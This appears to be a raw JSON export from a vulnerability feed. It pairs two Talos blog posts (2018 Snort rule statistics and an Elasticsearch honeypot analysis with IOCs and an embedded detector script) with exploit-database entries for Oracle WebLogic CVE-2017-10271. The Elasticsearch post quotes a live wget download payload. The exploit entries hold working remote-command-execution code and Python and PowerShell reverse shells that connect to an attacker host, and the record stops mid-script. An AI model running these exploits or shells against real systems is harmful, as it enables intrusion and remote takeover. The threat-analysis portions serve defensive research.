Historically, one of the most high-profile pieces of malware is [Zeus/Zbot](<https://talosintelligence.com/zeus_trojan>), a notorious trojan that has been employed by botnet operators around the world to steal banking credentials and other personal data, participate in click-fraud schemes, and likely numerous other criminal enterprises. It is the engine behind notorious botnets such as Kneber, which made headlines worldwide.

In the beginning of 2018, Talos observed a [Zeus variant](<https://blog.talosintelligence.com/2018/01/cfm-zeus-variant.html>) that was launched using the official website of Ukraine-based accounting software developer Crystal Finance Millennium (CFM).

This vector is similar to the attack outlined by Talos in the Nyetya and companion MeDoc blog post.
Ukrainian authorities and businesses were alerted by local security firm ISSP that another accounting software maker had been compromised. CFM's website was being used to distribute malware that was retrieved by malware downloaders attached to messages associated with a concurrent spam campaign.

Ever since the source code of Zeus leaked in 2011, we have seen various variants appear, such as [Zeus Panda](<https://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html>), which poisoned Google Search results in order to spread.

#### No. 1: 1:46237:1 "PUA-OTHER Cryptocurrency Miner outbound connection attempt" & 1:45549:4 "PUA-OTHER XMRig cryptocurrency mining pool connection attempt"

Over the past year, we have seen a seismic shift in the threat landscape with the explosive growth of malicious cryptocurrency mining. Cisco Talos created various rules throughout the year to combat cryptocurrency mining threats, and this rule, deployed in early 2018, proved to be number 1, showing the magnitude of attacks this rule detected and protected against. This threat has spread across the internet like wildfire and is being delivered through multiple vectors including email, web, and active exploitation. It is no surprise that these two combined rules are the most often triggered Snort rules in 2018.

Cryptocurrency mining can use up a considerable amount of computing power and energy that would otherwise be incredibly valuable to any organization.

For an overview of all related Snort rules and full details of all the methods and technologies Cisco Talos uses to thwart cryptocurrency mining, download the Talos whitepaper [here](<https://www.talosintelligence.com/resources/59>).
\n \n\n\n \n\n\n[](<https://2.bp.blogspot.com/-XcaLfnec00Q/XFsp6eXg_rI/AAAAAAAAACI/fxssE2sbuesqNKpMzg1Lbqnod5iU9u4oQCLcBGAs/s1600/012419-Snort-Sigs-Blog-outbound-connection-attempt.png>)\n\n \n\n\n### INBOUND and OUTBOUND\n\n \nNetwork traffic can cross an IDS from the external to the internal interface (inbound) or from the internal to the external interface (outbound). Depending on the architecture of your environment, some traffic can also avoid being filtered by a firewall or inspected by an IPS/IDS device altogether; this will generally be your local/internal traffic within the same layer 2 environment. An alert may be triggered and logged for any of these scenarios depending on the rulesets in place and the configuration of your sensors. \n \n \nOutbound rules were triggered during 2018 much more frequently than internal, which in turn were more frequent than inbound, with ratios of approximately 6.9 to 1. The profile of the alerts is different for each direction. Inbound alerts are likely to detect traffic that can be attributed to attacks on various server-side applications such as web applications or databases. Outbound alerts are more likely to contain detections of outgoing traffic caused by malware-infected endpoints. \n \nLooking at these data sets in more detail gives us the following: \n \n\n\n[](<https://4.bp.blogspot.com/-p8YZlzLMQXE/XFsqAliaQcI/AAAAAAAAACM/XhgffiU6hUYdyd21OCDF_QJAEpBKYYn1gCLcBGAs/s1600/012419-Snort-Sigs-Blog-inbound-signature-types.png>)\n\n \nWhile trojan activity was the rule type we saw the most of overall in 2018, making up 42.5 percent of all alerts, within inbound alerts \"Server-Apache\" takes the lead, followed by \"OS-Windows\" as a close second. \n \nThe \"Server-Apache\" class type covers Apache-related attacks, which in this case consisted mainly of 1:41818 and 1:41819 detecting the Jakarta Multipart parser vulnerability in Apache Struts ([CVE-2017-5638](<https://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>)). 
Later in 2017, a second Apache Struts vulnerability was discovered under CVE-2017-9805, making this rule type the most observed one for 2018 IDS alerts. \n \n\"OS-Windows\" class alerts were mainly triggered by Snort rule 1:41978, which covers the SMBv1 vulnerability exploited by [Wannacry](<https://blog.talosintelligence.com/2017/05/wannacry.html>) and [NotPetya](<https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html>) (MS-17-010). \n \nThe \"Browser-plugins\" class type covers attempts to exploit vulnerabilities in browsers that deal with plugins to the browser. (Example: ActiveX). Most activity for 2018 seems to consist of Sid 1:8068 which is amongst others linked to the \"Microsoft Outlook Security Feature Bypass Vulnerability\" (CVE-2017-11774). \n\n\n \n\n\n[](<http://2.bp.blogspot.com/-lKN6ktW9YRg/XF2L_nSsNfI/AAAAAAAAAVw/6G830jVQQA8On0TJLRDs0enzFolMyl-0QCK4BGAYYCw/s1600/012419-Snort-Sigs-Blog-outbound-signature-types.png>)[](<http://1.bp.blogspot.com/-hrZUBsvx4sw/XF2Py-Y-_-I/AAAAAAAAAWI/TU0EcE5KCNwNtIznDY93Bt6Hjn0WCih4QCK4BGAYYCw/s1600/012419-Snort-Sigs-Blog-outbound-signature-types.png>)\n\n \n \nFor outbound connections, we observed a large shift toward the \"PUA-Other\" class, which is mainly a cryptocurrency miner outbound connection attempt. Cryptomining can take up a large amount of valuable enterprise resources in terms of electricity and CPU power. To see how to block Cryptomining in an enterprise using Cisco Security Products, have a look at our [w](<https://blog.talosintelligence.com/2018/07/blocking-cryptomining.html>)[hitepaper](<https://blog.talosintelligence.com/2018/07/blocking-cryptomining.html>) published in July 2018. \n \nThe most frequently triggered rules within the \"Malware-CNC\" rule class are the Zeus trojan activity rules discussed above. \n\n\n### Conclusion\n\n \n\n\nSnort rules detect potentially malicious network activity. 
Understanding why particular rules are triggered and how they can protect systems is a key part of network security. Snort rules can detect and block attempts at exploiting vulnerable systems, indicate when a system is under attack, when a system has been compromised, and help keep users safe from interacting with malicious systems. They can also be used to detect reconnaissance and pre-exploitation activity, indicating that an attacker is attempting to identify weaknesses in an organization's security posture. These can be used to indicate when an organization should be in a heightened state of awareness about the activity occurring within their environment and more suspicious of security alerts being generated. \n \nAs the threat environment changes, it is necessary to ensure that the correct rules are in place protecting systems. Usually, this means ensuring that the most recent rule set has been promptly downloaded and installed. As shown in the Apache Struts vulnerability data, the time between a vulnerability being discovered and exploited may be short. \n \nOur most commonly triggered rule in 2018: 1:46237:1 \"PUA-OTHER Cryptocurrency Miner outbound connection attempt\" highlights the necessity of protecting IoT devices from attack. Malware such as Mirai seeks to compromise these systems to use them as part of a botnet to put to use for further malicious behaviour. Network architectures need to take these attacks into consideration and ensure that all networked devices no matter how small are protected. \n \nSecurity teams need to understand their network architectures and understand the significance of rules triggering in their environment. For full understanding of the meaning of triggered detections it is important for the rules to be open source. Knowing what network content caused a rule to trigger tells you about your network and allows you to keep abreast of the threat environment as well as the available protection. 
\n \nAt Talos, we are proud to maintain a set of open source Snort rules and support the thriving community of researchers contributing to Snort and helping to keep networks secure against attack. We're also proud to contribute to the training and education of network engineers through the Cisco Networking Academy, as well through the release of additional open-source tools and the detailing of attacks on our blog. \n \nYou can [subscribe](<https://www.snort.org/products>) to Talos' newest rule detection functionality for as low as $29 a year with a personal account. Be sure and see our business pricing for Snort as well [here](<https://snort.org/products%23rule_subscriptions>).", "cvss3": {}, "published": "2019-02-06T08:19:00", "type": "talosblog", "title": "2018 in Snort Rules", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11774", "CVE-2017-5638", "CVE-2017-9805"], "modified": "2019-02-12T14:15:53", "id": "TALOSBLOG:DAD87115458AF1FB5EDF5A2BB21D8AB9", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/6rupY-noy3s/2018-in-snort-signatures.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-03-01T16:16:02", "description": "__ \n \n_[Christopher Evans](<https://twitter.com/ccevans002>) of Cisco Talos conducted the research for this post._ \n \n\n\n## Executive Summary\n\n \nCisco Talos warns users that they need to keep a close eye on unsecured Elasticsearch clusters. We have recently observed a spike in attacks from multiple threat actors targeting these clusters. These attackers are targeting clusters using versions 1.4.2 and lower, and are leveraging old vulnerabilities to pass scripts to search queries and drop the attacker's payloads. These scripts are being leveraged to drop both malware and cryptocurrency miners on victim machines. Talos has also been able to identify social media accounts associated with one of these threat actors. 
Because Elasticsearch is typically used to manage very large datasets, the repercussions of a successful attack on a cluster could be devastating due to the amount of data present. This post details the attack methods used by each threat actor, as well as the associated payloads. \n \n\n\n## Introduction\n\n \nThrough ongoing analysis of honeypot traffic, Talos detected an increase in attacks targeting unsecured Elasticsearch clusters. These attacks leverage CVE-2014-3120 and CVE-2015-1427, both of which are only present in old versions of Elasticsearch and exploit the ability to pass scripts to search queries. Based on patterns in the payloads and exploit chains, Talos assesses with moderate confidence that six distinct actors are exploiting our honeypots. \n \nFor example CVE-2015-1427: \n\n\n> { \n \"size\": 1, \n \"script_fields\": { \n \"lupin\": { \n \"script\": \"java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"wget http://45.76.122.92:8506/IOFoqIgyC0zmf2UR/uuu.sh -P /tmp/sssooo\\\").getText()\" \n } \n } \n}\n\n \nThe most active of these actors consistently deploys two distinct payloads with the initial exploit, always using CVE-2015-1427. The first payload invokes wget to download a bash script, while the second payload uses obfuscated Java to invoke bash and download the same bash script with wget. This is likely an attempt to make the exploit work on a broader variety of platforms. The bash script utilized by the attacker follows a commonly observed pattern of disabling security protections and killing a variety of other malicious processes (primarily other mining malware), before placing its RSA key in the authorized_keys file. Additionally, this bash script serves to download illicit miners and their configuration files. The script achieves persistence by installing shell scripts as cron jobs. \n \nThis bash script also downloads a UPX-packed ELF executable. 
Analysis of the unpacked sample reveals that this executable contains exploits for a variety of other systems. These additional exploits target several vulnerabilities, all of which could lead to remote code execution, such as CVE-2018-7600 in Drupal, CVE-2017-10271 in Oracle WebLogic, and CVE-2018-1273 in Spring Data Commons. The exploits are sent, typically via HTTPS, to the targeted systems. As evidenced by each of these exploits, the attacker's goal appears to be obtaining remote code execution on targeted machines. Detailed analysis of the payload sample is ongoing, and Talos will provide pertinent updates as necessary. \n \nTalos observed a second actor exploiting CVE-2014-3120, using it to deliver a payload that is a derivative of the Bill Gates distributed denial-of-service malware. The reappearance of this malware is notable because, while Talos has previously observed this malware in our honeypots, the majority of actors have transitioned away from DDoS malware and pivoted toward illicit miners. \n \nA third actor attempts to download a file named \"LinuxT\" from an HTTP file server using exploits targeting CVE-2014-3120. The LinuxT file is no longer hosted on the command and control (C2) server despite continued exploits requesting the file, although several other malicious files are still being hosted. All of these files are detected by ClamAV as variants of the Spike trojan and are intended to run on x86, MIPS and ARM architectures. \n \nAs part of our research, we observed that, in some cases, hosts that attempted to download the \"LinuxT\" sample also dropped payloads that executed the command \"echo 'qq952135763'\". This behavior has been seen in Elasticsearch error logs going back several years. QQ is a popular Chinese social media website, and it is possible that this is referencing a QQ account. 
We briefly reviewed the public account activity of 952135763 and found several posts related to cybersecurity and exploitation, but nothing specific to this activity. While this information could potentially shed more light on the attacker, there is insufficient information currently to draw any firm conclusions. \n \n \n\n\n_\"About Me\" page of the attacker's personal website linking to the same QQ account number as in the command above._\n\n \n\n\nThis website also links to the potential attacker's Gitee page. Gitee is a Chinese code-sharing website similar to GitHub or Atlassian's Bitbucket. \n \n \n\n\n_Attacker's Gitee page._\n\n \n\n\nAlthough the projects associated with this Gitee profile are not explicitly malicious, Talos has linked this QQ account to a profile on the Chinese hacking forum xiaoqi7, as well as to a history of posts on topics related to exploits and malware on other forums. \n \nOur honeypots also detected additional hosts exploiting Elasticsearch to drop payloads that execute both \"echo 'qq952135763'\" and \"echo '952135763'\", suggesting that these attacks are related to the same QQ account. However, none of the IPs associated with these attacks have been observed attempting to download the \"LinuxT\" payload linked to this attacker. Additionally, unlike other activity associated with this attacker, these attacks leveraged the newer Elasticsearch vulnerability (CVE-2015-1427) rather than the older one (CVE-2014-3120). \n \nThe three remaining actors that Talos identified have not been observed delivering any malware through their exploits. One actor issued an \"rm *\" command, while the other two actors were fingerprinting vulnerable servers by issuing 'whoami' and 'id' commands. 
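The script_fields request shown above is the whole attack: the cluster accepts script source inside a search body, and the Groovy sandbox lets that source reach `java.lang.Runtime`. A defender who can see request bodies (reverse-proxy logs, a honeypot, or a packet capture) can triage them mechanically. The following is an added example and not Talos code: it walks a request body, finds every inline script, and flags the reflection and downloader idioms the payloads on this page use. The four sample bodies are constructed; the first mirrors the CVE-2015-1427 request above, the second is a CVE-2014-3120-style MVEL script, and `45.76.122.92:8506` is the hosting address from the IOC list below, reproduced only as sample data.

```python
import json
import re

# Request-body keys under which Elasticsearch accepts inline script source
# ("script" in the 1.x line, "inline" in later releases). script_fields,
# script_score and script filters all bottom out in one of these holding a string.
SCRIPT_KEYS = {"script", "inline"}

# Reflection and process-spawning idioms from the CVE-2014-3120 (MVEL) and
# CVE-2015-1427 (Groovy sandbox bypass) payloads, plus the download helpers the
# droppers call. Math.class.forName("java.lang.Runtime") is how the sample on
# this page reaches Runtime.exec from inside the Groovy sandbox.
DANGEROUS = re.compile(
    r"java\.lang\.Runtime\b|java\.lang\.ProcessBuilder\b|\.class\.forName\(|"
    r"getRuntime\(\)|\.exec\(|\bwget\b|\bcurl\b|/bin/sh|/tmp/"
)


def iter_scripts(node, path="$"):
    """Yield (json_path, script_source) for every string found under a script key."""
    if isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}.{key}"
            if key in SCRIPT_KEYS and isinstance(value, str):
                yield child, value
            else:
                yield from iter_scripts(value, child)
    elif isinstance(node, list):
        for index, item in enumerate(node):
            yield from iter_scripts(item, f"{path}[{index}]")


def analyze_request(body):
    """Classify one search request body.

    deny   - an inline script reaches for the JVM runtime or a downloader
    review - an inline script is present (should not happen with dynamic scripting off)
    allow  - no inline script at all
    """
    try:
        doc = json.loads(body)
    except json.JSONDecodeError:
        return {"verdict": "review", "scripts": [], "indicators": {},
                "reason": "body is not valid JSON"}
    scripts = list(iter_scripts(doc))
    indicators = {}
    for json_path, source in scripts:
        found = sorted({m.group(0) for m in DANGEROUS.finditer(source)})
        if found:
            indicators[json_path] = found
    if indicators:
        verdict = "deny"
    elif scripts:
        verdict = "review"
    else:
        verdict = "allow"
    return {"verdict": verdict, "scripts": [p for p, _ in scripts],
            "indicators": indicators}


# Constructed sample bodies (not captured traffic). GROOVY_RCE mirrors the
# CVE-2015-1427 request quoted on this page; MVEL_RCE is a CVE-2014-3120-style
# script; the last two are ordinary queries.
GROOVY_RCE = json.dumps({
    "size": 1,
    "script_fields": {"lupin": {"script":
        'java.lang.Math.class.forName("java.lang.Runtime").getRuntime().exec('
        '"wget http://45.76.122.92:8506/IOFoqIgyC0zmf2UR/uuu.sh -P /tmp/sssooo").getText()'}},
})
MVEL_RCE = json.dumps({
    "query": {"match_all": {}},
    "script_fields": {"cmd": {"script":
        'import java.io.*; Runtime.getRuntime().exec("id").getInputStream()'}},
})
BENIGN_SCRIPT = json.dumps({
    "query": {"match": {"title": "elasticsearch"}},
    "script_fields": {"double_price": {"script": "doc['price'].value * 2"}},
})
NO_SCRIPT = json.dumps({"query": {"term": {"user": "kimchy"}}})


if __name__ == "__main__":
    for name, body in [("groovy", GROOVY_RCE), ("mvel", MVEL_RCE),
                       ("benign-script", BENIGN_SCRIPT), ("no-script", NO_SCRIPT)]:
        result = analyze_request(body)
        print(f"{name:14s} {result['verdict']:7s} {result['indicators']}")
```

A "review" verdict on a cluster where dynamic scripting is supposed to be off is itself a finding: on the 1.x releases discussed here the relevant elasticsearch.yml settings are `script.disable_dynamic: true` and, for 1.3/1.4, `script.groovy.sandbox.enabled: false`, but upgrading past 1.4.2 is the fix the post recommends.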
\n \n\n\n## Conclusion\n\n \nTalos has observed multiple attackers exploiting CVE-2014-3120 and CVE-2015-1427 in our Elasticsearch honeypots to drop a variety of malicious payloads. Additionally, Talos has identified some social media accounts we believe could belong to the threat actor dropping the \"LinuxT\" payload. These Elasticsearch vulnerabilities only exist in versions 1.4.2 and lower, so any cluster running a modern version of Elasticsearch is unaffected by these vulnerabilities. Given the size and sensitivity of the data sets these clusters contain, the impact of a breach of this nature could be severe. Talos urges readers to patch and upgrade to a newer version of Elasticsearch if at all possible. Additionally, Talos highly recommends disabling the ability to send scripts through search queries if that ability is not strictly necessary for your use cases. \n \n\n\n## Coverage\n\n \nThe following SNORT\u24c7 rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org. \n \n**CVE-2014-3120:** 33830, 36256, 44690 \n \n**CVE-2015-1427:** 33814,36067 \n \n**CVE-2017-10271:** 45304 \n \n**CVE-2018-7600:** 46316 \n \n**CVE-2018-1273:** 46473 \n \nAdditional ways our customers can detect and block this threat are listed below. \n \n \nAdvanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors. \n \nCisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \nEmail Security can block malicious emails sent by threat actors as part of their campaign. 
\n \nNetwork Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat. \n \nAMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products. \n \nUmbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \n\n\n## IOCs:\n\n \n**First Actor:** \n \n**Attacking IP addresses:** \n \n101[.]200[.]48[.]68 \n117[.]205[.]7[.]194 \n107[.]182[.]183[.]206 \n124[.]43[.]19[.]159 \n139[.]99[.]131[.]57 \n179[.]50[.]196[.]228 \n185[.]165[.]116[.]144 \n189[.]201[.]192[.]242 \n191[.]189[.]30[.]112 \n192[.]210[.]198[.]50 \n195[.]201[.]169[.]194 \n216[.]15[.]146[.]34 \n43[.]240[.]65[.]121 \n45[.]76[.]136[.]196 \n45[.]76[.]178[.]34 \n52[.]8[.]60[.]118 \n54[.]70[.]161[.]251 \n139[.]159[.]218[.]82 \n \n**IP addresses and ports hosting malware:** \n \n45[.]76[.]122[.]92:8506 \n207[.]148[.]70[.]143:8506 \n \n**SHA256 of delivered malware:** \n \nbbd6839074adea734213cc5e40a0dbb31c4c36df5a5bc1040757d6baec3f8415 e2f1be608c2cece021e68056f2897d88ed855bafd457e07e62533db6dfdc00dc \n191f1126f42b1b94ec248a7bbb60b354f2066b45287cd1bdb23bd39da7002a8c \n2bcc9fff40053ab356ddde6de55077f8bf83d8dfa6d129c250f521eb170dc123 \n9a181c6a1748a9cfb46751a2cd2b27e3e742914873de40402b5d40f334d5448c 5fe3b0ba0680498dbf52fb8f0ffc316f3a4d7e8202b3ec710b2ae63e70c83b90 \n7b08a8dae39049aecedd9679301805583a77a4271fddbafa105fa3b1b507baa3 \n \n**Second Actor:** \n \n**Attacking IP address:** \n \n202[.]109[.]143[.]110 \n \n**IP address and port hosting malware:** \n \n216[.]176[.]179[.]106:9090 \n \n**SHA256 of delivered malware:** \n \nbbd6839074adea734213cc5e40a0dbb31c4c36df5a5bc1040757d6baec3f8415 \n \n**Third Actor:** \n \n**Attacking IP addresses:** \n \n125[.]231[.]139[.]75 \n36[.]235[.]171[.]244 \n \n**IP addresses linked to QQ account, but not 
delivering malware:** \n \n121[.]207[.]227[.]84 \n125[.]77[.]30[.]184 \n \n**IP address and port hosting malware:** \n \n104[.]203[.]170[.]198:5522 \n \n**SHA256 of malware hosted on above IP address:** \n \n7f18c8beb8e37ce41de1619b2d67eb600ace062e23ac5a5d9a9b2b3dfaccf79b dac92c84ccbb88f058b61deadb34a511e320affa7424f3951169cba50d700500 e5a04653a3bfbac53cbb40a8857f81c8ec70927a968cb62e32fd36143a6437fc d3447f001a6361c8454c9e560a6ca11e825ed17f63813074621846c43d6571ba 709d04dd39dd7f214f3711f7795337fbb1c2e837dddd24e6d426a0d6c306618e 830db6a2a6782812848f43a4e1229847d92a592671879ff849bc9cf08259ba6a \n \n**Remaining actors:** \n \n**Attacking IP addresses:** \n \n111[.]19[.]78[.]4 \n15[.]231[.]235[.]194 \n221[.]203[.]81[.]226 \n111[.]73[.]45[.]90 \n121[.]207[.]227[.]84 \n125[.]77[.]30[.]184 \n \n\n\n", "cvss3": {}, "published": "2019-02-26T10:56:00", "type": "talosblog", "title": "Cisco Talos Honeypot Analysis Reveals Rise in Attacks on Elasticsearch Clusters", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2014-3120", "CVE-2015-1427", "CVE-2017-10271", "CVE-2018-1273", "CVE-2018-7600"], "modified": "2019-03-01T15:56:50", "id": "TALOSBLOG:3F14583676BF3FEC18226D8E465C8707", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/uGLhJU8rCm8/cisco-talos-honeypot-analysis-reveals.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:39", "description": "\nOracle WebLogic Server 10.3.6.0.0 12.x - Remote Command Execution", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-12-26T00:00:00", 
"type": "exploitpack", "title": "Oracle WebLogic Server 10.3.6.0.0 12.x - Remote Command Execution", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2017-12-26T00:00:00", "id": "EXPLOITPACK:C22F157FABAD412B7D508C7EEC750856", "href": "", "sourceData": "import requests\nimport sys\n\nurl_in = sys.argv[1]\npayload_url = url_in + \"/wls-wsat/CoordinatorPortType\"\npayload_header = {'content-type': 'text/xml'}\n\n\ndef payload_command (command_in):\n html_escape_table = {\n \"&\": \"&\",\n '\"': \"\"\",\n \"'\": \"'\",\n \">\": \">\",\n \"<\": \"<\",\n }\n command_filtered = \"<string>\"+\"\".join(html_escape_table.get(c, c) for c in command_in)+\"</string>\"\n payload_1 = \"<soapenv:Envelope xmlns:soapenv=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\"> \\n\" \\\n \" <soapenv:Header> \" \\\n \" <work:WorkContext xmlns:work=\\\"http://bea.com/2004/06/soap/workarea/\\\"> \\n\" \\\n \" <java version=\\\"1.8.0_151\\\" class=\\\"java.beans.XMLDecoder\\\"> \\n\" \\\n \" <void class=\\\"java.lang.ProcessBuilder\\\"> \\n\" \\\n \" <array class=\\\"java.lang.String\\\" length=\\\"3\\\">\" \\\n \" <void index = \\\"0\\\"> \" \\\n \" <string>cmd</string> \" \\\n \" </void> \" \\\n \" <void index = \\\"1\\\"> \" \\\n \" <string>/c</string> \" \\\n \" </void> \" \\\n \" <void index = \\\"2\\\"> \" \\\n + command_filtered + \\\n \" </void> \" \\\n \" </array>\" \\\n \" <void method=\\\"start\\\"/>\" \\\n \" </void>\" \\\n \" </java>\" \\\n \" </work:WorkContext>\" \\\n \" 
</soapenv:Header>\" \\\n \" <soapenv:Body/>\" \\\n \"</soapenv:Envelope>\"\n return payload_1\n\ndef do_post(command_in):\n result = requests.post(payload_url, payload_command(command_in ),headers = payload_header)\n\n if result.status_code == 500:\n print \"Command Executed \\n\"\n else:\n print \"Something Went Wrong \\n\"\n\n\n\nprint \"***************************************************** \\n\" \\\n \"**************** Coded By 1337g ****************** \\n\" \\\n \"* CVE-2017-10271 Blind Remote Command Execute EXP * \\n\" \\\n \"***************************************************** \\n\"\n\nwhile 1:\n command_in = raw_input(\"Eneter your command here: \")\n if command_in == \"exit\" : exit(0)\n do_post(command_in)", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-01T19:04:39", "description": "\nOracle WebLogic 10.3.6 - wls-wsat Component Deserialisation Remote Command Execution", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-01-03T00:00:00", "type": "exploitpack", "title": "Oracle WebLogic 10.3.6 - wls-wsat Component Deserialisation Remote Command Execution", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2018-01-03T00:00:00", "id": "EXPLOITPACK:E47A4ABCB334901131160C872A570166", "href": "", "sourceData": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Exploit Title: Weblogic wls-wsat Component Deserialization RCE\n# Date Authored: Jan 3, 2018\n# Date Announced: 10/19/2017\n# Exploit Author: Kevin Kirsche (d3c3pt10n)\n# Exploit Github: https://github.com/kkirsche/CVE-2017-10271\n# Exploit is based off of POC by Luffin from Github\n# https://github.com/Luffin/CVE-2017-10271\n# Vendor Homepage: http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html\n# Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0\n# Tested on: Oracle WebLogic 10.3.6.0.0 running on Oracle Linux 6.8 and Ubuntu 14.04.4 LTS\n# CVE: CVE-2017-10271\n# Usage: python exploit.py -l 10.10.10.10 -p 4444 -r http://will.bepwned.com:7001/\n# (Python 3) Example check listener: python3 -m http.server 4444\n# (Python 2) Example check listener: python -m SimpleHTTPServer 4444\n# (Netcat) Example exploit listener: nc -nlvp 4444\n\nfrom sys import exit\nfrom requests import post\nfrom argparse import ArgumentParser\nfrom random import choice\nfrom string import ascii_uppercase, ascii_lowercase, digits\nfrom xml.sax.saxutils import escape\n\nclass Exploit:\n\n def __init__(self, check, rhost, lhost, lport, windows):\n self.url = rhost if not rhost.endswith('/') else rhost.strip('/')\n self.lhost = lhost\n self.lport = lport\n self.check = check\n if windows:\n self.target = 'win'\n else:\n self.target = 'unix'\n\n if self.target == 'unix':\n # Unix reverse shell\n # You should also be able to instead use something from MSFVenom. 
E.g.\n # msfvenom -p cmd/unix/reverse_python LHOST=10.10.10.10 LPORT=4444\n self.cmd_payload = (\n \"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.\"\n \"SOCK_STREAM);s.connect((\\\"{lhost}\\\",{lport}));os.dup2(s.fileno(),0); os.dup2(\"\n \"s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);'\"\n ).format(lhost=self.lhost, lport=self.lport)\n else:\n # Windows reverse shell\n # Based on msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.10.10 LPORT=4444\n self.cmd_payload = (\n r\"powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) \"\n r\"{$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='\" + self.lhost +\"\"\n r\"';$p='\"+ self.lport + \"';$c=New-Object system.net.sockets.tcpclient;$c.connect($a\"\n r\",$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;\"\n r\"$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';\"\n r\"$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;\"\n r\"$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;\"\n r\"$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;\"\n r\"while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};\"\n r\"$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;\"\n r\"while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0)\"\n r\" -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;\"\n r\"if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};\"\n r\"if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if \"\n r\"($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne\"\n r\" -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e.\"\n r\"GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};\"\n )\n self.cmd_payload = escape(self.cmd_payload)\n\n def 
